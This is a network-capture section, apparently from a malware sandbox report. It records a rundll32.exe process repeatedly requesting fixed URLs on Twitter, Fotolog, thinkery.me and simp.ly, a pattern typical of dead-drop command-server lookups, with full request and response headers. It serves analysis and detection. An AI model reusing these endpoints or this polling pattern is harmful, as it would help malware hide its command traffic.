                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:48.711705923 CET7644INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:48 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_u75v2U8gQ+d80MayObf6lA=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:48 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403394864274980; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:48 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 22790fc067762a5861274855f01e2546
                                                                                                                                                x-response-time: 106


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                103192.168.2.649983172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:49.534487009 CET7656OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:49.962299109 CET7656INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:49 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:49 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d84ab840000d9113e822000000001
                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=CGoGGx26xnuxLyxTNbnuayHs5YrOD5Kk67xM%2BZbeSwaxthtn9Q25jy%2F7VAVkxJgAAcxoGq0rUMECc8adauMmrLvtTD%2FgKZOJW%2F%2FGnCApUtc%3D"}],"max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3d58d932d911-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                104192.168.2.6499855.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:51.316535950 CET7704OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:51.385020971 CET7705INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:51 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                105192.168.2.649987192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:52.137571096 CET7716OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:52.300318956 CET7716INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:52 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                106192.168.2.649989104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:53.009038925 CET7725OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:53.174079895 CET7725INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:53 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_Lq4X8GumtUu3qA2zM3ChBg=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:53 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403395310859418; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:53 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 0d216bf1c77fd607f65feb7411e37b8d
                                                                                                                                                x-response-time: 107


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                107192.168.2.649992172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:53.902371883 CET7737OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:54.424356937 CET7738INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:54 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:54 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d84bc9400000b4f413b5000000001
                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=k7z5gCUmLuVVSJUdS6PldNyJitGqaEmxMh70zZJ8E0h%2Fdjha93TVkiUG480K5wn10mYYOrppQXidqRN2uqP0SeTgvBaBN1OHAKl0l7YZ%2FnA%3D"}],"max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3d741be80b4f-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                108192.168.2.6499945.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:55.855149984 CET7785OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:55.924365044 CET7785INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:55 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                109192.168.2.649996192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:56.770348072 CET7797OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:56.937943935 CET7797INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:56 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                11192.168.2.649751172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:09.088653088 CET1569OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:09.802154064 CET1570INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:09 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:09 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d83232600000b5fde2de000000001
                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=JLV5elxqCo3a7hU0O4PB5NUkSuwyDDk72aq72LDOwtJt4R1mogV1gNYLKD2qONHHtDPpP5cnqCrdaZv%2F80B2knBdJ1n20DjdASSee55jIwE%3D"}],"max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3ae50fba0b5f-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                110192.168.2.649998104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:57.546020985 CET7806OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:57.718389034 CET7807INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:57 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_qWbCNs+ke0oU/Dlfwsz/fw=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:57 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403395764989907; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:57 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: a50142db406e73be076f878faac37346
                                                                                                                                                x-response-time: 114


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                111192.168.2.650001172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:58.384169102 CET7818OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:58.842711926 CET7819INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:58 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:58 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d84ce150000c833ee81d000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=0ct7UAchaDWrxuFW0hTqerLi0yCLwge1vBsjZxd3NQXV93jObqPeTUFxzrI9%2F5mynXywQexltDPWtfVfiyyfglIXqmBh3upJuL7Lg9MGI7I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3d902955c833-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                112192.168.2.6500035.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:59.753278971 CET7863OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:59.826913118 CET7863INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:59 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                12192.168.2.6497535.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:10.823075056 CET1618OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:10.895040035 CET1618INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:10 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                13192.168.2.649755192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:11.926903963 CET1630OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:12.095962048 CET1630INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:12 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                14192.168.2.649757104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:13.681616068 CET1639OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:13.846071959 CET1639INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:13 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_FA8jgEJ/EVAX/7AAoh+c/Q=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:13 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403385378460989; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:13 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: a93eb5d4b572cb227356483fad987bcc
                                                                                                                                                x-response-time: 108


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                15192.168.2.649760172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:14.553173065 CET1651OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:15.006872892 CET1652INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:14 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:14 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d83387e0000bf7dfe815000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aIC4UOZEsUem0tLagmEuahlzGCrzA7sJVdtLN3Fm%2FMCNP6TQJemMPooC7iZkGVRf5TzPV%2B2pGuqZArT4f%2FC1zusYZHqumR7EzZSce4TJfIk%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3b073d05bf7d-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                16192.168.2.6497625.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:15.859553099 CET1700OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:15.928906918 CET1700INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:15 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                17192.168.2.649764192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:16.686091900 CET1711OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:16.848913908 CET1712INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:16 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
